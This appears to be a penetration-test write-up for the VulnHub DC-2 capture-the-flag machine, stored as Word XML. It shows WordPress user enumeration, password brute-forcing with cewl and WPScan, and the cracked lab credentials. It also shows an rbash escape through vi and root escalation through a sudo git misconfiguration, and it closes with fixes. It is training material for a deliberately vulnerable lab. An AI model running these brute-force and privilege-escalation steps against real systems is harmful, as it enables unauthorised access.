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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNHUB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2C3E50"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">CTF PENETRATION TEST WRITE-UP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr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Target Machine: DC-2  |  Difficulty: Beginner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ABB2B9"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: May 27, 2025  |  Author: Pavan Darade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="1400"/>
      </w:pP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report details the full exploitation of VulnHub machine DC-2, a WordPress-based CTF challenge. The engagement covered reconnaissance, credential enumeration via WPScan, restricted shell bypass, and sudo privilege escalation through git. Five flags were captured and root was achieved.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Machine Name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DC-2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Platform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VulnHub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OS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 (Debian)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Difficulty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Beginner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Flags Captured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/ 5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Root Access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Test Date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27, 2025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Tester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Pavan Darade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1  Host &amp; Port Discovery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Nmap was used to scan the target and reveal open ports.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 nmap -sV -sC -p- 192.168.56.103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400"/>
        <w:gridCol w:w="3840"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trP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80/tcp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httpd 2.4.10 (WordPress)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7744/tcp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OpenSSH 6.7p1 Debian</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2  WordPress Enumeration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HTTP service revealed a WordPress installation. WPScan was used to enumerate users.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 wpscan --url http://192.168.56.103 --enumerate u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[+] Users found: admin, jerry, tom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Initial Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1  Password Cracking with cewl + wpscan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custom wordlist was generated from the DC-2 website using cewl and then used with WPScan to brute-force credentials.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 cewl http://192.168.56.103 -w wordlist.txt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 wpscan --url http://192.168.56.103 -U users.txt -P wordlist.txt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[+] Valid Combinations Found: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jerry:adipiscing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tom:parturient</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2  Flag 1 &amp; 2 via WordPress Admin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Logged in as jerry, Flag 1 was found in WordPress pages. Logged in as tom revealed Flag 2.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FLAG 1: flag{7f4ab0e7ea...} — Found in WP page 'flag1'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FLAG 2: flag{5c19b36748...} — Found in WP page 'flag2'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Shell Access &amp; Restricted Shell Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1  SSH Login as tom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SSH access was gained using tom's credentials on port 7744. The shell was restricted (rbash).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 ssh tom@192.168.56.103 -p 7744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tom@DC-2:~$ echo $SHELL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/bin/rbash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2  Bypass rbash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restricted bash was escaped by leveraging vi as an editor and spawning a shell from within it.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 vi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:set shell=/bin/bash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:shell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tom@DC-2:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin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FLAG 3: flag{b6b545dc11...} — /home/tom/flag3.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1  Lateral Movement to jerry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 su jerry  # Password: adipiscing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FLAG 4: flag{b5a8bdb36e...} — /home/jerry/flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2  sudo git Escalation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jerry was allowed to run git as root via sudo. This was abused using GTFOBins.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 sudo -l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(root) NOPASSWD: /usr/bin/git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 sudo git -p help config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!/bin/bash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root@DC-2:~# id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uid=0(root) gid=0(root) groups=0(root)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FLAG 5: flag{512bb5082e...} — /root/final-flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Flags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60"/>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="18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Flag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Difficulty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Flag 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WordPress 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WP login as jerry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Easy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Flag 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WordPress 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WP login as tom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Easy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Flag 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/home/tom/flag3.txt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rbash bypass via vi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Flag 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/home/jerry/flag4.txt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su jerry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Flag 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/root/final-flag.txt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sudo git GTFOBins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Hard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Vulnerability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1400"/>
        <w:gridCol w:w="14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Vulnerability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CVSS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Weak WordPress Creds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Brute-forceable admin/user passwords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Restricted Shell Bypass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rbash escaping via vi editor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6.8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sudo git Misconfiguration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git allowed as root without password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7.8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Username Enumeration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WPScan reveals valid WordPress usernames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5.3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0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Recommendations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Enforce strong passwords and account lockout policies on WordPress.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Replace rbash with a properly sandboxed shell environment.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Audit and restrict /etc/sudoers — remove unnecessary NOPASSWD entries.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Keep WordPress core, themes, and plugins fully updated.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Disable user enumeration via the WordPress REST API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Tools &amp; References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Nmap — Port scanning and service enumeration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WPScan — WordPress vulnerability and user enumeration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cewl — Custom wordlist generation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GTFOBins — sudo binary abuse reference (https://gtfobins.github.io)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VulnHub DC-2 — https://www.vulnhub.com/entry/dc-2,311/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Disclaimer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write-up was created solely for educational purposes as part of a CTF exercise on VulnHub. All testing was conducted in an isolated lab environment. Do not use these techniques against systems without explicit written authorisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pP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ABB2B9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">End of Report — VulnHub DC-2 CTF Write-Up — Pavan Darade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392B" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Prepared by: Pavan Darade</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	Page #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C0392B"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">VulnHub DC-2 CTF Write-Up</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9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0392B" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:after="160" w:before="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C0392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922B2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2026-05-27T13:49:20.629Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-27T13:49:20.645Z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